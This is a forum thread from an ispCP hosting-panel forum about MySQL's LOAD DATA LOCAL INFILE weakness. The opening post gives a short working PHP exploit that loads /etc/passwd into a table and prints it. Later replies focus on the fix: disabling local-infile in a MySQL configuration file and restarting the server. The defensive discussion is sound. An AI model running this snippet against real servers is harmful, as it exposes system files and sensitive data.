exploit

[sci2tech]

Well known, old, not generated by ispcp but affect it.

Code:

<?php
$link = mysql_connect('localhost', 'sqluser1', 'sqluser1');
mysql_select_db('bla');
mysql_query("CREATE TABLE a (a varchar(1024))");
mysql_query("LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE a");
$result = mysql_query("SELECT a FROM a");
while(list($row) = mysql_fetch_row($result))
print "$row\n";
mysql_query("DROP TABLE `a`");
?>

To get rid of this, you need to add in my.cnf in section [mysqld]

Quote:set-variable=local-infile=0

Maybe this should be implement as a security feature in ispcp

[aseques]

The issue it's quite grave, even tought you can not get /etc/shadow, you can get lots of sensitive information if mysql is not chrootted (in ispcp it isn't)
In the case of Plesk, they set the value to 0 too.

[ephigenie]

mh.

yeah we'll see that we test if the value is present and if not append it in the [mysqld] section. lets see how we can do that.

But after all it should be clear that this kind of information gathering is only possible if the attackers has a valid mysql account - or has found a method to inject malicious code into installed php applications (i.e. phpbb 2.x and so on are good candidates for such things )

[aseques]

In /etc/mysql/my.cnf, you can read

Code:

....................
#
# * IMPORTANT: Additional settings that can override those from this file!
#
!includedir /etc/mysql/conf.d/

So, you could probably create an /etc/mysql/conf.d/ispcp with the customized settings...

[ephigenie]

yeah this is a good point ... (lets see how this works out)

[FeG]

Hi,

I'd suppose to create a file in /etc/mysql/conf.d named i.e. exploit-fix.cnf with the following content:

Code:

# Fixing http://www.isp-control.net/forum/exploit-t-3772.html
[mysqld]
set-variable=local-infile=0

until this is fixed officially by an ispCP config file.
You'll have to restart mysql thereafter:

Code:

/etc/init.d/mysql restart

Greetings
FeG